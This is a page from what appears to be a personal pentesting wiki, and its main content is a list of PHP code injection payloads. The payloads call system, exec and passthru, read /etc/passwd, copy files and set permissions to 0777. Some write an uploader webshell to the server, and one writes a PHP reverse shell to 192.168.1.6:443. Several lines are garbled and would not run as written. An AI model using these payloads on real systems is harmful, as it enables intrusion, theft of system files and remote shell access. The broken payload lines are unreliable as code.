AKUMA
  • README 🥷🏽
  • Red Teaming 👹
    • Loading 50% 😒
  • 👿BLUE TEAM
    • YARA rules
  • 📦Containers
    • DOCKER
      • Docker Security & Pentesting
        • Commond Docker error
      • 8 Best Practices for Docker Host Security
  • Windows Hardening 🛡️
    • Windows Active Directory Pentesting
      • Dll Hijacking
      • MSDT - Microsoft Support Diagnostic Tool Vulnerability
      • AD Enumeration TOOL
      • AD Certificate Templates
      • Kerberos Delegation
    • Windows Security Controls
      • Applocker Basics
    • Powershell Cheat sheet
    • AMSI Bypass
  • Linux Hardening 🛡️
    • Page 1
  • Network Services Pentesting
    • Footprinting Cheat sheet
      • 21-FTP
      • 161-SNMP
      • 445-SMB-139
      • 2049-NFS
      • 53-DNS
      • 587-SMTP
      • 143-IMAP/POP3
    • Juicy Curl
  • Pentesting Web
    • 100 Web Vulnerabilities, categorized into various types
    • Deserialization
      • Node.js Deserialization
    • SHODAN DORK
    • Vulnerabilities PAYLOADS
      • Directory Traversal Payload
      • Html-Injection-Read-FIle
      • Html-Injection
      • OS-Command-Injection
      • SQL-Injection-Auth-Bypass
      • PHP-Code-Injection
      • SQL-Injection
      • SSRF Basic
      • SSRF
      • XML-External-Entity
      • XSLT (eXtensible Stylesheet Language Transformations)
      • XSS Cheat Sheet
        • XSS
        • XSS -
        • XSS-polyglots
        • Cloudflare's XSS protection
    • Base Information
      • File-Extension-Inclusion
        • File-Inclusion-Windows
        • File-Inclusion-Linux
        • File-Extension
      • Media-Type-(MIME)
      • Windows-Sensitive-Files
      • Linux-Sensitive-Files
      • Linux-Log-Files
  • Blogs
    • How I Passed HTB Certified Penetration Testing Specialist
    • A comparative analysis of Open Source Web Application vulnerability scanners (Rana Khalil)
    • Sean Metcalfe Path for AD
    • Secure Docker - HackerSploit
  • Projects
    • HOME LAB
      • HOME LAB Blogs | Active Directory
        • Active Directory Lab Setup - 101
        • Active Directory Lab Setup - 102
        • Active Directory Lab Setup [ AD Enumeration ] - 103
        • Active Directory Lab Setup [AD Attacks ] - 104
      • Home Lab | Splunk Setup & Configuration
    • HOSTING A WEBSITE AND HARDENING ITS SECURITY
  • CTF- Writeups/ Solutions
    • HTB - Advanced Labs
      • Fortress
        • Jet
        • Akerva
        • Context
        • Synacktv
        • Faraday
        • AWS
      • Endgames
        • Ascension
        • RPG
        • Hades
        • Xen
        • P.O.O.
    • idekCTF 2024 🚩
    • TFC CTF 2024 🏳
    • DeadSec CTF 2024 🏴
      • Bing2 (web)
      • Mic_check (misc)
      • Windows Server (OSINT)
    • ImaginaryCTF 2024 🚩
      • cartesian-1 [Forensics]
      • packed [FORENSICS]
      • bom [FORENSICS]
      • BANK [MISC]
    • NahamCon CTF 2024 🏳
      • all WARMUPs
      • Base3200
      • The Hacker Webstore
      • iDoor
      • All About Robots
      • Thomas DEVerson
      • Helpful Desk
      • Curly Fries
    • Cyber Apocalypse 2024: Hacker Royale 🏴
      • Unbreakable [MISC]
      • StopDropAndRoll [MISC]
      • Character [MISC]
      • Delulu [pwn]
      • Tutorial [pwn]
      • Maze [Hardware]
      • TimeKORP [web]
  • Tools
    • Content Discovery & Form Manipulation
      • ffuf
      • RustScan
      • Feroxbuster
      • Dirsearch
      • Gobuster
      • Wfuzz
      • Webshell
      • websocket
Powered by GitBook
On this page
  1. Pentesting Web
  2. Vulnerabilities PAYLOADS

PHP-Code-Injection

phpinfo(); system("id") ;system("id") exec("id") shell_exec("id") id passthru("id") readfile(/etc/passwd

Payload

;id
'id'
;id;
&&id
echo 'id'
system('id')
;system('id')
system("id")
SYSTEM("id")
system(%27id%27)
system('id');phpinfo()
SYSTEM('id');PHPINFO()
;system('/usr/bin/id')
system('cat /etc/passwd');
;system('cat /etc/passwd')
shell exec("id")
SHELL EXEC("id")
exec("id")
EXEC("id")
exec("ping -c 4 192.168.1.6")
passthru("id")
PASSTHRU("id")
phpinfo()
phpinfo();id
PHPINFO()
PHPINFO();id
phpinfo();system('cat /etc/passwd')
phpinfo();system('id')
PHPINFO();SYSTEM('id')
print_r($_POST);system('id')
PRINT_R($_POST);SYSTEM('id')
pcntl_exec("/usr/bin/uptime")
readfile?"/etc/passwd")
file get contents ("/etc/passwd")
$file = fopen ("testl.txt", "w"); echo fwrite($file, "Hello World. Testing!"); fclose($file)
$file = fopen ("phpinfo-1.php", "W"); echo fwrite ($file, "<?php phpinfo(); ?>"); fclose ($file)
$file = fopen("pshell.php", "w"); echo fwrite($file, "php -r '$sock=fsockopen ('192.168.1.6' ,443) ;' /bin/sh -i <83 >83 2-83' ;"); fclose($file)
$file = fopen ("upload2.php", "w"); echo fwrite($file, '<html><form action="upload2.php" method="post" enctype="multipart/form-data">Select image to upload; <input type="file" name="fileToUpload" id="fileToUpload"><input type="submit" value="Upload" name="submit"></form></html><?php if( isset ($_POST["submit"])){ $file_name = $_FILES["fileToUpload"] ["name"]; $file_tmp_name = $FILES["fIleToUpload"("tmpname"]; if (move uploaded_file($file_tmp_ name, " ./" . $file_name)) { echo "ok"; } } ?>'); fclose($file)
passthru('id')
PASSTHRU('id')
;SYSTEM('id')
readfile("/etc/passwd");
readfile("index.html");
READFILE("index.html")
READFILE("/etc/passwd")
echo%20file_exists("index.html");
echo%20file_exists("/etc/passwd");
ECHO%20FILE_EXISTS("index.html");
ECHO%20FILE_EXISTS("/etc/passwd");
chmod("index.html",0777);
CHMOD("index.html",0777);
echo%20copy("/etc/passwd","/tmp/passwd");
echo%20file_exists("/tmp/passwd");
echo%20file_get_contents("/etc/passwd");
ECHO%20FILE_GET_CONTENTS("/etc/passwd");
echo%20file_put_contents("index.html","Hello%20World.%20Testing!");
ECHO%20FILE_PUT_CONTENTS("index.html","HELLO%20WORLD.%20TESTING!");
echo%20fileperms("index.html");
echo%20fileperms("/etc/passwd");
ECHO%20FILEPERMS("index.html");
ECHO%20FILEPERMS("/etc/passwd");
print_r(glob("*.txt"));
print_r(glob("*.html"));
print_r(glob("*.config"));
PreviousSQL-Injection-Auth-BypassNextSQL-Injection

Last updated 9 months ago